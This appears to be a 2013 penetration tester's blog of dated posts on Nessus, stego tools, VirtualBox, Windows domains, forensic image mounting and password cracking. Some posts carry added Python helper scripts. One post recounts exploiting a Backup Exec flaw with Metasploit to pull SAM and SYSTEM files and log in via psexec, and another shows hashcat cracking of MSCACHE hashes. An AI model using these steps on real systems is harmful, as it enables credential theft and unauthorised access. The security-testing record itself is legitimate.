Thursday 31 October 2013

Install root CA into Nessus

Came across this little 'gem' today while sorting out internal SSL certificate results for a customer who uses our internal network vulnerability scanner, which is essentially a custom web front end (with scheduling and remediation assignment) on top of a Nessus Pro feed back-end.

Anyway, they wanted to install their own CA cert, from internal PKI, to remove SSL Certificate errors.

All you need to do is:

1. Save your root CA into PEM format and rename it as custom_CA.inc

cp cert.cer custom_CA.inc

2. Copy the custom_CA.inc to the Nessus lib plugins folder

sudo cp custom_CA.inc /opt/nessus/lib/nessus/plugins/

Now all those pesky SSL certificate errors for internal SSL-based connections won't appear in your results.

NOTE: Don't do this for external SSL-based services; you really should be using an SSL cert signed by a recognised Certificate Authority (CA).
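Step 1 says "PEM format", and a DER .cer copied straight to custom_CA.inc will not be picked up, so it is worth checking the file before installing it. The script below is an added example (my code, not Nessus' and not from the original post): it accepts PEM or DER, converts DER to PEM, and checks that the certificate's outer DER SEQUENCE spans exactly the file, which catches truncated or non-certificate files. It does not validate the signature or the CA flag; use openssl x509 for that. The only Nessus-specific assumption is the custom_CA.inc file name from the post; SAMPLE_DER is a constructed minimal DER SEQUENCE standing in for a real certificate, which is all the structural check looks at.

```python
"""Sanity-check a root CA file before it becomes Nessus' custom_CA.inc."""
import base64
import ssl
import sys

PEM_BEGIN = b"-----BEGIN CERTIFICATE-----"
PEM_END = b"-----END CERTIFICATE-----"

# Constructed stand-in for a DER certificate: a minimal DER SEQUENCE holding one
# INTEGER.  X.509 certificates are also an outer SEQUENCE (tag 0x30).
SAMPLE_DER = b"\x30\x03\x02\x01\x05"


def der_outer_length(der: bytes) -> int:
    """Total length (header + content) declared by the outer DER SEQUENCE."""
    if len(der) < 2 or der[0] != 0x30:
        raise ValueError("not a DER SEQUENCE (first byte is not 0x30)")
    first = der[1]
    if first < 0x80:
        return 2 + first                      # short-form length
    n = first & 0x7F                          # long form: n length bytes follow
    if n == 0 or n > 4 or len(der) < 2 + n:
        raise ValueError("bad DER length encoding")
    return 2 + n + int.from_bytes(der[2:2 + n], "big")


def to_pem(data: bytes) -> str:
    """Return PEM text for a certificate given as PEM or DER; raise on anything else."""
    if PEM_BEGIN in data:
        start = data.index(PEM_BEGIN) + len(PEM_BEGIN)
        end = data.index(PEM_END)             # ValueError if the END marker is missing
        if end < start:
            raise ValueError("PEM END marker precedes BEGIN marker")
        der = base64.b64decode(b"".join(data[start:end].split()), validate=True)
    else:
        der = data
    # The outer SEQUENCE must account for every byte: no trailing junk, no truncation.
    if der_outer_length(der) != len(der):
        raise ValueError("DER length field does not match the data length")
    return ssl.DER_cert_to_PEM_cert(der)


def is_certificate_like(data: bytes) -> bool:
    """True if to_pem() accepts the bytes (binascii.Error is a ValueError subclass)."""
    try:
        to_pem(data)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    # Usage: python check_ca.py cert.cer > custom_CA.inc
    with open(sys.argv[1], "rb") as fh:
        sys.stdout.write(to_pem(fh.read()))
```

Run it as the redirect shows and copy the resulting custom_CA.inc into /opt/nessus/lib/nessus/plugins/ as in step 2.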

HTH

Wednesday 18 September 2013

Installing JSteg in Ubuntu

JSteg is another great tool I have been reading about whilst brushing up on my stego; the book is linked in my previous post.

JSteg

wget http://zooid.org/~paul/crypto/jsteg/jpeg-v4.tar.Z

zcat jpeg-v4.tar.Z | tar xvf -

cd {extracted-source-directory}

cp makefile.ansi Makefile

cp jmemansi.c jmemsys.c

make

sudo cp cjpeg djpeg /usr/local/bin

(Replace {extracted-source-directory} with the directory the tarball unpacks into.)
Test it:

cjpeg -h

usage: cjpeg [switches] [inputfile]
Switches (names may be abbreviated):
  -quality N     Compression quality (0..100; 5-95 is useful range)
  -grayscale     Create monochrome JPEG file
  -optimize      Optimize Huffman table (smaller file, but slow compression)
  -targa         Input file is Targa format (usually not needed)
Switches for advanced users:
  -restart N     Set restart interval in rows, or in blocks with B
  -smooth N      Smooth dithered input (N=1..100 is strength)
  -maxmemory N   Maximum memory to use (in kbytes)
  -verbose  or  -debug   Emit debug output
Switches for wizards:
  -qtables file  Use quantization tables given in file
  -sample HxV[,...]  Set JPEG sampling factors


djpeg -h
usage: djpeg [switches] [inputfile]
Switches (names may be abbreviated):
  -colors N      Reduce image to no more than N colors
  -gif           Select GIF output format
  -pnm           Select PBMPLUS (PPM/PGM) output format (default)
  -quantize N    Same as -colors N
  -targa         Select Targa output format
Switches for advanced users:
  -blocksmooth   Apply cross-block smoothing
  -grayscale     Force grayscale output
  -nodither      Don't use dithering in quantization
  -onepass       Use 1-pass quantization (fast, low quality)
  -maxmemory N   Maximum memory to use (in kbytes)
  -verbose  or  -debug   Emit debug output

HTH
 
 

Install StegHide in Ubuntu

I've recently been brushing up on my Stego, and have been reading an excellent book called "Data Hiding"; highly recommended reading.

Anyway, I've been installing most of the tools used in the book and have found that most of them are quite old and take a bit of work to compile. I'm making notes here on how I've achieved the install on my host, currently Ubuntu 12.04.

StegHide

You need a few dependencies here:

sudo apt-get install -y libjpeg-dev libmcrypt-dev libmhash-dev

Then you can try to compile the source; I still couldn't get it to compile, so I installed a .deb from Launchpad!


wget http://launchpadlibrarian.net/5049761/steghide_0.5.1-8_amd64.deb && sudo dpkg -i steghide_0.5.1-8_amd64.deb

Try it:

steghide 
steghide version 0.5.1

the first argument must be one of the following:
 embed, --embed          embed data
 extract, --extract      extract data
 info, --info            display information about a cover- or stego-file
   info <filename>       display information about <filename>
 encinfo, --encinfo      display a list of supported encryption algorithms
 version, --version      display version information
 license, --license      display steghide's license
 help, --help            display this usage information

embedding options:
 -ef, --embedfile        select file to be embedded
   -ef <filename>        embed the file <filename>
 -cf, --coverfile        select cover-file
   -cf <filename>        embed into the file <filename>
 -p, --passphrase        specify passphrase
   -p <passphrase>       use <passphrase> to embed data
 -sf, --stegofile        select stego file
   -sf <filename>        write result to <filename> instead of cover-file
 -e, --encryption        select encryption parameters
   -e <a>[<m>]|<m>[<a>]  specify an encryption algorithm and/or mode
   -e none               do not encrypt data before embedding
 -z, --compress          compress data before embedding (default)
   -z <l>                using level <l> (1 best speed...9 best compression)
 -Z, --dontcompress      do not compress data before embedding
 -K, --nochecksum        do not embed crc32 checksum of embedded data
 -N, --dontembedname     do not embed the name of the original file
 -f, --force             overwrite existing files
 -q, --quiet             suppress information messages
 -v, --verbose           display detailed information

extracting options:
 -sf, --stegofile        select stego file
   -sf <filename>        extract data from <filename>
 -p, --passphrase        specify passphrase
   -p <passphrase>       use <passphrase> to extract data
 -xf, --extractfile      select file name for extracted data
   -xf <filename>        write the extracted data to <filename>
 -f, --force             overwrite existing files
 -q, --quiet             suppress information messages
 -v, --verbose           display detailed information

options for the info command:
 -p, --passphrase        specify passphrase
   -p <passphrase>       use <passphrase> to get info about embedded data

To embed emb.txt in cvr.jpg: steghide embed -cf cvr.jpg -ef emb.txt
To extract embedded data from stg.jpg: steghide extract -sf stg.jpg

HTH

Tuesday 16 July 2013

Join 2008 R2 to Windows 2000 Domain

So in my lab, which I carry around on my laptop to replicate client setups, I have many flavours of Windows and they are generally joined to a domain.

Today, I wanted to add a Windows 2008 R2 VM to a Windows 2000 Domain, so off I went:

Start > Run > dcpromo

I ran through the install and got the following error:

Me being me, I'm always in a rush and didn't realise this had to be run on the existing domain. I was trying for about 10 minutes to run it on the 2008 R2 box:


So I ran it on the existing Win2K DC (don't shout, this is a vulnerable lab - you know!); however, it didn't like it at all and I got an error about running a 64-bit version of adprep.exe! So I Google searched, and lovely TechNet told me that I needed to download a 32-bit version of Windows 2008, but not to worry, as I could use the eval version: http://technet.microsoft.com/en-us/library/cc731728(v=ws.10).aspx


In the same folder as adprep.exe there is an adprep32.exe - run that sh*t and you're cooking on gas:

adprep32.exe /forestprep

Now, as long as you're a member of the Enterprise Admins group and you've replicated at least once, you should be winning:



Now you'll need to change the Windows 2000 domain to Native Mode:



Now you need to run:

adprep32.exe /domainprep

You should have a successful message:



Now run dcpromo on the Windows 2008 box and you should be home free:


One more GIF, cause I know you like them so much ;-)


HTH

Cannot register the DVD image '/usr/share/virtualbox/VBoxGuestAdditions.iso'

Came across this lovely error today, when updating VirtualBox on an old laptop from 4.1 to 4.2:

Cannot register the DVD image '/usr/share/virtualbox/VBoxGuestAdditions.iso' {20f4b244-eb29-4082-ac34-4acf6ccb4904} because a CD/DVD image '/usr/share/virtualbox/VBoxGuestAdditions.iso' with UUID {62ebaac7-ba6d-4d7d-876b-362642de4c1b} already exists
I was like, "sh*t, my VMs are dead"!








Edit the '.vbox' file for the VM in question:

$ sudo nano -c /path/to/virtualbox/vm.vbox

Delete any lines that are located between the tags:

<DVDImages> and </DVDImages>

Save the file and start your VM.
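The same edit done with an XML parser instead of nano, as an added example (my code, not VirtualBox's and not from the original post): it drops every Image under DVDImages so VirtualBox can re-register the Guest Additions ISO under its new UUID, and writes a .bak copy before touching a real file. SAMPLE_VBOX is a constructed, cut-down .vbox (real files carry many more elements); the UUID and ISO path in it are the ones quoted in the error message above.

```python
"""Strip stale DVD image registrations from a VirtualBox .vbox file."""
import shutil
import xml.etree.ElementTree as ET

VBOX_NS = "http://www.virtualbox.org/"
ET.register_namespace("", VBOX_NS)   # keep the default namespace on output

# Constructed sample .vbox; the machine and disk UUIDs are placeholders.
SAMPLE_VBOX = """<?xml version="1.0"?>
<VirtualBox xmlns="http://www.virtualbox.org/" version="1.12-linux">
  <Machine uuid="{00000000-0000-0000-0000-000000000001}" name="lab-vm">
    <MediaRegistry>
      <HardDisks>
        <HardDisk uuid="{00000000-0000-0000-0000-00000000000a}" location="lab-vm.vdi" format="VDI" type="Normal"/>
      </HardDisks>
      <DVDImages>
        <Image uuid="{20f4b244-eb29-4082-ac34-4acf6ccb4904}" location="/usr/share/virtualbox/VBoxGuestAdditions.iso"/>
      </DVDImages>
    </MediaRegistry>
  </Machine>
</VirtualBox>
"""


def _local(tag):
    """Strip the {namespace} prefix ElementTree puts on tag names."""
    return tag.rsplit("}", 1)[-1]


def strip_dvd_images(xml_text):
    """Return (new_xml, number_of_Image_elements_removed)."""
    root = ET.fromstring(xml_text)
    # Collect first, then mutate, so we never remove while iterating the tree.
    dvd_nodes = [node for node in root.iter() if _local(node.tag) == "DVDImages"]
    removed = 0
    for node in dvd_nodes:
        for image in list(node):
            node.remove(image)
            removed += 1
    return ET.tostring(root, encoding="unicode"), removed


def clean_vbox_file(path):
    """Back up path to path.bak, rewrite it without DVD images, return the count removed."""
    shutil.copy2(path, path + ".bak")
    with open(path, encoding="utf-8") as fh:
        new_xml, removed = strip_dvd_images(fh.read())
    with open(path, "w", encoding="utf-8") as fh:
        fh.write('<?xml version="1.0"?>\n' + new_xml + "\n")
    return removed


if __name__ == "__main__":
    import sys
    print(clean_vbox_file(sys.argv[1]), "DVD image(s) removed")
```

Stop the VM (and ideally VirtualBox itself) before rewriting the file, since VirtualBox overwrites .vbox files on exit.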

HTH

Monday 15 July 2013

Installing VBox Guest Additions in Fedora

You need a few extra bits before you can install Guest Additions in Fedora:

$ sudo yum install kernel-headers kernel-devel gcc

Then go for it:

$ cd /run/media/mac/VBOXADDITIONS_4.2.16_86992
$ sudo ./VBoxLinuxAdditions.run

Finally, when the installer finishes, we need to add our user to the 'vboxusers' group:

$ sudo usermod -a -G vboxusers {user}

Replace {user} with your username. Then reboot to finish.

HTH



Friday 28 June 2013

Sawmill Log File Analyser on Ubuntu

Quick post. Today I was trying to get the Sawmill log file analyser working on Ubuntu and it kept failing to load due to a missing library. The error:

mac [ ~/Tools/sawmill ]$ ls
Extras  LICENSE  LogAnalysisInfo  README  sawmill
mac [ ~/Tools/sawmill ]$ ./sawmill
./sawmill: error while loading shared libraries: libcrypto.so.0.9.8: cannot open shared object file: No such file or directory
So I looked at the dependencies the script needed:


mac [ ~/Tools/sawmill ]$ ldd ./sawmill
linux-vdso.so.1 =>  (0x00007fffc07ff000)
libdl.so.2 => /lib/x86_64-linux-gnu/libdl.so.2 (0x00007f515b72a000)
libnsl.so.1 => /lib/x86_64-linux-gnu/libnsl.so.1 (0x00007f515b510000)
libresolv.so.2 => /lib/x86_64-linux-gnu/libresolv.so.2 (0x00007f515b2f3000)
libz.so.1 => /lib/x86_64-linux-gnu/libz.so.1 (0x00007f515b0dc000)
libcrypto.so.0.9.8 => not found
libpthread.so.0 => /lib/x86_64-linux-gnu/libpthread.so.0 (0x00007f515aebe000)
libssl.so.0.9.8 => not found
libstdc++.so.6 => /usr/lib/x86_64-linux-gnu/libstdc++.so.6 (0x00007f515abbe000)
libm.so.6 => /lib/x86_64-linux-gnu/libm.so.6 (0x00007f515a8c1000)
libgcc_s.so.1 => /lib/x86_64-linux-gnu/libgcc_s.so.1 (0x00007f515a6ab000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f515a2ec000)
/lib64/ld-linux-x86-64.so.2 (0x00007f515b94a000)

There they are: libssl and libcrypto. Now I would have thought libssl-dev would have covered these, but no:

mac [ ~/Tools/sawmill ]$ sudo apt-get install libssl-dev
Reading package lists... Done
Building dependency tree    
Reading state information... Done
libssl-dev is already the newest version.
0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.

A little Google search and the solution was:

sudo apt-get install libssl0.9.8
Reading package lists... Done
Building dependency tree    
Reading state information... Done
The following NEW packages will be installed
  libssl0.9.8
0 upgraded, 1 newly installed, 0 to remove and 0 not upgraded.
Need to get 861 kB of archives.
After this operation, 2,391 kB of additional disk space will be used.
Get:1 http://gb.archive.ubuntu.com/ubuntu/ precise-updates/universe libssl0.9.8 amd64 0.9.8o-7ubuntu3.1 [861 kB]
Fetched 861 kB in 0s (2,344 kB/s)
Preconfiguring packages ...
Selecting previously unselected package libssl0.9.8.
(Reading database ... 242938 files and directories currently installed.)
Unpacking libssl0.9.8 (from .../libssl0.9.8_0.9.8o-7ubuntu3.1_amd64.deb) ...
Setting up libssl0.9.8 (0.9.8o-7ubuntu3.1) ...
Processing triggers for libc-bin ...
ldconfig deferred processing now taking place
Winner, winner, chicken dinner!
mac [ ~/Tools/sawmill ]$ ./sawmill
Sawmill 8.6.2.1; Copyright (c) 1996-2013 Flowerfire, Inc.
Web server running; browse http://192.168.0.14:8988/ to use Sawmill.
To run on a different IP address, use "sawmill -sh ip-addr -ws t"
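The diagnostic step above (read ldd, pick out the "not found" entries) as an added example, my code rather than anything from the post or from Sawmill. LDD_SAMPLE is the ldd output quoted above; the parser also distinguishes the kernel-provided vDSO entry, which has no path but is not missing. One caveat a practitioner would want: the fix above satisfies a binary linked against OpenSSL 0.9.8, a branch that has since reached end of life, so a vendor binary that insists on it is worth flagging rather than just quietly satisfying.

```python
"""Parse `ldd` output and list the shared libraries the loader cannot find."""
import re
import subprocess

# Copied from the ldd output shown in the post.
LDD_SAMPLE = """\
    linux-vdso.so.1 =>  (0x00007fffc07ff000)
    libdl.so.2 => /lib/x86_64-linux-gnu/libdl.so.2 (0x00007f515b72a000)
    libnsl.so.1 => /lib/x86_64-linux-gnu/libnsl.so.1 (0x00007f515b510000)
    libresolv.so.2 => /lib/x86_64-linux-gnu/libresolv.so.2 (0x00007f515b2f3000)
    libz.so.1 => /lib/x86_64-linux-gnu/libz.so.1 (0x00007f515b0dc000)
    libcrypto.so.0.9.8 => not found
    libpthread.so.0 => /lib/x86_64-linux-gnu/libpthread.so.0 (0x00007f515aebe000)
    libssl.so.0.9.8 => not found
    libstdc++.so.6 => /usr/lib/x86_64-linux-gnu/libstdc++.so.6 (0x00007f515abbe000)
    libm.so.6 => /lib/x86_64-linux-gnu/libm.so.6 (0x00007f515a8c1000)
    libgcc_s.so.1 => /lib/x86_64-linux-gnu/libgcc_s.so.1 (0x00007f515a6ab000)
    libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f515a2ec000)
    /lib64/ld-linux-x86-64.so.2 (0x00007f515b94a000)
"""

# "<soname> => <target> (0x<load address>)"; the address is absent for "not found".
LINE_RE = re.compile(r"^\s*(\S+)\s*=>\s*(.*?)\s*(\(0x[0-9a-f]+\))?\s*$")


def parse_ldd(text):
    """Map each soname to its resolved path; "" for virtual entries such as the
    vDSO, None when the loader reported "not found"."""
    deps = {}
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue          # e.g. the bare dynamic-loader line with no "=>"
        name, target = m.group(1), m.group(2)
        deps[name] = None if target == "not found" else target
    return deps


def missing_libraries(text):
    """Sonames that must be installed before the binary will start."""
    return [name for name, path in parse_ldd(text).items() if path is None]


def ldd_of(path):
    """Run ldd on a real binary and parse the result (not exercised by the tests)."""
    proc = subprocess.run(["ldd", path], capture_output=True, text=True, check=False)
    return parse_ldd(proc.stdout)


if __name__ == "__main__":
    import sys
    for name in missing_libraries(subprocess.run(["ldd", sys.argv[1]],
                                                 capture_output=True, text=True).stdout):
        print("missing:", name)
```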


HTH

Tuesday 4 June 2013

Veritas Backup Exec Windows Remote File Access

Whilst on a client engagement today, I came across some Windows 2003 application servers using the Veritas Backup Exec client.

The version in use was affected by a vulnerability highlighted in CVE-2005-2611.

"VERITAS Backup Exec for Windows Servers 8.6 through 10.0, Backup Exec for NetWare Servers 9.0 and 9.1, and NetBackup for NetWare Media Server Option 4.5 through 5.1 uses a static password during authentication from the NDMP agent to the server, which allows remote attackers to read and write arbitrary files with the backup server."

Metasploit has a nice little module for downloading files and directories from the box; it's located here:

auxiliary/admin/backupexec/dump

It's very straightforward to use.

Set the path of the file you want to download, in my case I went for the C:\Windows\repair folder, to get the SYSTEM and SAM files.

Then you need to set the port that the client is listening on, in my case the default port of 10000 was in use.

Then run.

The module downloads the file or directory, but its format is MTF.

I did a little digging around and MTF is an acronym for Microsoft Tape Format, which is an old school compression format.

The Metasploit module says the following:

"This module abuses a logic flaw in the Backup Exec Windows Agent to download arbitrary files from the system. This flaw was found by someone who wishes to remain anonymous and affects all known versions of the Backup Exec Windows Agent. The output file is in 'MTF' format, which can be extracted by the 'NTKBUp' program listed in the references section. To transfer an entire directory, specify a path that includes a trailing backslash."

and has the following references:

Well, the http://www.fpns.net/willy/msbksrc.lzh link, doesn't do a thing and the others are just vulnerability references.

More Googling found this mirror site:


And I downloaded the following files:

        Friday, July 09, 2004  9:33 AM       123909 msbkdos.lzh
        Friday, July 09, 2004  9:33 AM       127385 msbklin.lzh
        Friday, July 09, 2004  9:34 AM       107354 msbksrc.lzh
        Friday, July 09, 2004  9:34 AM       121070 msbkwin.lzh
Now, I don't normally run files from any old site on my host, but this was a last straw for me and the only vulnerability in quite a tidy network. So I uploaded the 4 .lzh files to a Windows virtual machine along with the .mtf file produced by the Metasploit module, and disconnected the network adapter from the VM - just to be on the safe side!

I unpacked msbkwin.lzh with 7-Zip and found a few files; the one to use is NTBKUP.exe and you want to use it like this:

c:\msbkwin\NTBKUP.EXE {metasploit_backup_exec_dump_module_file.mtf} -x

This extracted the contents of the C:\Windows\repair\ directory that was downloaded from the 2003 server I exploited.

This worked for me: I got the local Administrator hash from the SYSTEM file, and used the Metasploit psexec module to login to the box.

HTH

Sunday 2 June 2013

Mounting Encase Images in Linux

So recently I've been solving some of the Digital Corpora scenario-based forensic challenges. The image files are created using the commercial tool EnCase, which takes an exact image of the disk and creates a file in the Expert Witness Format, also known as the EnCase Image Format.

These images can be converted, without damaging the original file-system, to 'dd' format and browsed like any other file system in Linux.

For the example below, I am going to use two EnCase image files, used in the M57-Jean Forensic Scenario on the Digital Corpora web site.

This guide explains how to mount an EnCase image using 'xmount' and 'dd'.

$ sudo -s

# apt-get install ewf-tools xmount

('dd' is part of coreutils, so it is already installed.)

'cd' to the directory where you have the EnCase image and use 'ewfinfo' to look at the EnCase image details.

# cd Forensic_Challenges

# ewfinfo nps-2008-jean.E01

mac [ ~/Forensic_Challenges ]$ ewfinfo nps-2008-jean.E01
ewfinfo 20100226 (libewf 20100226, libuna 20091031, libbfio 20091114, zlib 1.2.3.4, libcrypto 1.0.0, libuuid)

Acquiry information
Description: Jean's hard drive from the first M57 project
Examiner name: Donny
Evidence number: 2008-M57-Jean
Acquiry date: Mon Jan 31 21:38:29 2011
System date: Mon Jan 31 21:38:29 2011
Operating system used: Darwin
Software version used: 20101104
Password: N/A

EWF information
File format: EnCase 6
Sectors per chunk: 64
Error granularity: 64
Compression type: best compression
GUID: 5005a83f-a4db-a14b-b645-5c55e6b2bec8

Media information
Media type: fixed disk
Is physical: no
Bytes per sector: 512
Amount of sectors: 20971520
Media size: 10 GiB (10737418240 bytes)

Digest hash information
MD5: 78a52b5bac78f4e711607707ac0e3f93


Make a note of the MD5 sum of the image (the last line of the ewfinfo output above).

Create a location to mount the EnCase image (You can name this directory as you wish, I'm a bit anal with directory names, I forget things easily, so name directories with obvious names).

# mkdir /mnt/temp_image_mount

It's always good to have a look at the man page for a command before randomly executing commands on your machine.

# man xmount

xmount(1)                                                      xmount                                                     xmount(1)

NAME
       xmount - Tool to crossmount between multiple input and output harddisk image files

SYNOPSIS
       xmount [[fopts] [mopts]] <ifile> [<ifile> [...]] <mntp>

DESCRIPTION
       xmount  allows  you  to  convert on-the-fly between multiple input and output harddisk image types. xmount creates a virtual
       file system using FUSE (Filesystem in Userspace) that contains a virtual representation of the input image. The virtual rep‐
       resentation  can  be  in  raw  DD,  VirtualBox's  virtual disk file format, Microsoft's Virtual Hard Disk Image format or in
       VmWare's VMDK file format. Input images can be raw DD, EWF (Expert Witness Compression Format)  or  AFF  (Advanced  Forensic
       Format)  files.  In  addition,  xmount  also supports virtual write access to the output files that is redirected to a cache
       file. This makes it possible to boot acquired harddisk images using QEMU, KVM, VirtualBox, VmWare or alike.

OPTIONS
       fopts: (Options specific to FUSE)
         -d: Enable FUSE's and xmount's debug mode.
         -h: Display this help message.
         -s: Run single threaded.
         -o no_allow_other: Disable automatic addition of FUSE's allow_other option.
         -o <fmopts>:
           Specify fuse mount options. Will also disable automatic addition of FUSE's
           allow_other option!
         INFO: For VMDK emulation, you have to uncomment "user_allow_other" in
               /etc/fuse.conf or run xmount as root.
       mopts: (Options specific to xmount)
         --cache <file>:
           Enable virtual write support and set cachefile to use.
         --in <type>:
           Specify input image type. Type can be "dd" or "ewf".
         --info :
           Print out some infos about used compiler and libraries.
         --out <type>:
           Specify output image type. Type can be "dd", "vdi", "vhd", "vmdk(s)".
         --owcache <file>:
           Same as --cache <file> but overwrites existing cache.
         --rw <file>:
           Same as --cache <file>.
         --version :
           Same as --info.
         INFO: Input and output image type defaults to "dd" if not specified.
       ifile:
         Input image file. If you use EWF files, you have to specify all image
         segments! (If your shell supports it, you can use .E?? as file
         extension to specify them files)
       mntp:
         Mount point where virtual files should be located.

BUGS
       Hopefully none. If you find any, please e-mail to .

EXAMPLE
       To xmount an EWF image from your acquired disk as a raw DD image under /mnt, use the following command:

         xmount --in ewf ./acquired_disk.E?? /mnt

So we can see how it works right there, and mount it pretty easily. 'xmount' will mount both the E01 and E02 segments as one .dd image; to tell it to do this we use the '??' wildcard:

# xmount --in ewf nps-2008-jean.E?? /mnt/temp_image_mount

If all worked correctly, you should have created a 'dd' combining the images:

# ls -alth

mac [ /mnt/temp_image_mount ]$ ls -alth
total 4.0K
drwxr-xr-x 5 root root 4.0K May 31 18:28 ..
drwxrwxrwx 2 root root    0 Jan  1  1970 .
-r--r--r-- 1 root root  10G Jan  1  1970 nps-2008-jean.dd
-r--r--r-- 1 root root  334 Jan  1  1970 nps-2008-jean.inf

To ensure we haven't altered the original disk image, we can do a 'md5sum' of the 'dd' image and compare it to the original md5 calculation:

# md5sum nps-2008-jean.dd

mac [ /mnt/temp_image_mount ]$ md5sum nps-2008-jean.dd 
78a52b5bac78f4e711607707ac0e3f93  nps-2008-jean.dd

Compare that MD5 string to the one output by our original ewfinfo command; if they match, we have a forensically sound copy of the original image. This means we can analyse the 'dd' image without ever altering the original EnCase image.

To mount this 'dd' image we need a further bit of information and we can get this with the 'fdisk' command:

# fdisk -l nps-2008-jean.dd

mac [ /mnt/temp_image_mount ]$ sudo fdisk -l nps-2008-jean.dd 

Disk nps-2008-jean.dd: 10.7 GB, 10737418240 bytes
255 heads, 63 sectors/track, 1305 cylinders, total 20971520 sectors
Units = sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk identifier: 0x39bf39be

Device                       Boot   Start         End              Blocks        Id  System
nps-2008-jean.dd1   *          63             20948759    10474348+   7   HPFS/NTFS/exFAT

So we can see that the volume is NTFS and we can see the starting sector. To mount it with the Linux 'mount' command we need to specify the offset as well as the mount options we want (read-only here), and we also need to create a directory to mount the dd image on.

# mkdir /mnt/nps-2008-jean

To calculate the offset we need to multiply the starting sector by the sector size, so in my case:

63 * 512 = 32256

(63 is the partition's start sector from the fdisk output and 512 is the bytes per sector.)

# mount -t ntfs -o ro,offset=32256 nps-2008-jean.dd /mnt/nps-2008-jean/

If everything worked as it should, you should be able to open your favourite file manager, and browse to /mnt/nps-2008-jean

# caja /mnt/nps-2008-jean/
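The offset arithmetic and the hash comparison from this walkthrough, written out as an added example (my code, not from the post and not part of xmount or ewf-tools). FDISK_SAMPLE and the MD5 values are copied from the output shown above; the parser handles any number of partition rows in this fdisk layout, reads the sector size from the output instead of assuming 512, and maps the MBR type id to a mount -t value (falling back to auto). The generated mount command keeps the post's ro option so the dd image stays forensically sound.

```python
"""Mount offsets for partitions inside a raw image, plus the ewfinfo/md5sum check."""
import re

# fdisk -l output as shown in the post.
FDISK_SAMPLE = """\
Disk nps-2008-jean.dd: 10.7 GB, 10737418240 bytes
255 heads, 63 sectors/track, 1305 cylinders, total 20971520 sectors
Units = sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk identifier: 0x39bf39be

Device                       Boot   Start         End              Blocks        Id  System
nps-2008-jean.dd1   *          63             20948759    10474348+   7   HPFS/NTFS/exFAT
"""

# Digest from the ewfinfo output and the md5sum line from the post.
EWFINFO_MD5 = "78a52b5bac78f4e711607707ac0e3f93"
MD5SUM_LINE = "78a52b5bac78f4e711607707ac0e3f93  nps-2008-jean.dd"

SECTOR_RE = re.compile(r"Sector size \(logical/physical\): (\d+) bytes")
# device, optional "*" boot flag, start, end, blocks (may end in "+"), hex id, system name
PART_RE = re.compile(
    r"^(?P<device>\S+)\s+(?P<boot>\*\s+)?(?P<start>\d+)\s+(?P<end>\d+)\s+"
    r"(?P<blocks>\d+\+?)\s+(?P<id>[0-9a-fA-F]{1,2})\s+(?P<system>.+?)\s*$"
)

# MBR partition type ids with a definite filesystem driver; anything else gets "auto".
FS_BY_ID = {"7": "ntfs", "b": "vfat", "c": "vfat"}


def sector_size(fdisk_text):
    """Logical sector size reported by fdisk, defaulting to 512 if the line is absent."""
    m = SECTOR_RE.search(fdisk_text)
    return int(m.group(1)) if m else 512


def partitions(fdisk_text):
    """Parse the partition rows; 'offset' is the byte value mount -o offset= needs."""
    size = sector_size(fdisk_text)
    rows = []
    for line in fdisk_text.splitlines():
        m = PART_RE.match(line)
        if not m:
            continue          # header and geometry lines never have a numeric Start field
        start = int(m.group("start"))
        rows.append({
            "device": m.group("device"),
            "bootable": m.group("boot") is not None,
            "start": start,
            "end": int(m.group("end")),
            "id": m.group("id").lower().lstrip("0") or "0",
            "system": m.group("system"),
            "offset": start * size,
        })
    return rows


def mount_command(part, image, mountpoint):
    """Read-only mount command for one parsed partition."""
    fstype = FS_BY_ID.get(part["id"], "auto")
    return f"mount -t {fstype} -o ro,offset={part['offset']} {image} {mountpoint}"


def hashes_match(ewfinfo_md5, md5sum_line):
    """Compare the ewfinfo digest with the first field of an md5sum output line."""
    return ewfinfo_md5.strip().lower() == md5sum_line.split()[0].lower()


if __name__ == "__main__":
    print("image verified:", hashes_match(EWFINFO_MD5, MD5SUM_LINE))
    for part in partitions(FDISK_SAMPLE):
        print(mount_command(part, "nps-2008-jean.dd", "/mnt/nps-2008-jean"))
```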



HTH



Monday 20 May 2013

Debian Optirun/Bumblebee/Ironhide on GT 525M 1 GB and HashCat

So I have a nice little GPU in my testing laptop and have just got it running with Optirun/Bumblebee/Ironhide so I can use it with oclHashCat-Plus.

First you need to add the Debian Bumblebee repo:

$ sudo -s

# wget -O - http://suwako.nomanga.net/suwako.asc | apt-key add -

# nano /etc/apt/sources.list

add the following lines

deb http://suwako.nomanga.net/debian sid main contrib
deb-src http://suwako.nomanga.net/debian sid main

# apt-get update

# apt-get install bumblebee bumblebee-nvidia

# adduser {user} bumblebee

# reboot

Once you're back on, test it's working by running:

$ optirun glxgears -info

If you see three cogs pop up in a window and they turn, it's game on!

Now a real test: hashcat. You need a few libs to run hashcat:

$ sudo apt-get install -y libcuda1

$ cd /opt

$ wget http://hashcat.net/files/oclHashcat-plus-0.14.7z

$ sudo apt-get install p7zip

$ sudo 7zr x oclHashcat-plus-0.14.7z

$ cd oclHashcat-plus-0.14

Now hashcat can be a bitch to use, as every cmd option has to be in the right place; however, it's frick*n awesome, especially with a GPU, and there's plenty of info on how to use it here.

Quick e.g. using hashes dumped from MSCACHE, which I'm always attempting to crack ;-)

./cudahashcat-plus64.bin -m 1100 {hash-file.cap} {wordlist.txt} -r rules/d3ad0ne.rule -o output.txt

Replace {hash-file.cap} with your captured hash file (hashcat will only accept them in the format administrator:2758937hedfsdjkhgfjk) and replace {wordlist.txt} with the wordlist of your choice.

Wordlists - there's only one for me:

http://downloads.skullsecurity.org/passwords/rockyou.txt.bz2

Happy Cracking ;-)




Compiling Jumbo John (JTR) for MSCACHE Password Auditing

So to attempt a password audit on MSCACHE v2 password hashes you will need to compile John The Ripper Jumbo.

$ wget http://openwall.com/john/g/john-1.7.9-jumbo-7.tar.gz

$ tar zxvf john-1.7.9-jumbo-7.tar.gz

$ cd john-1.7.9-jumbo-7/src/

$ make linux-x86-64    (for a 64-bit OS)

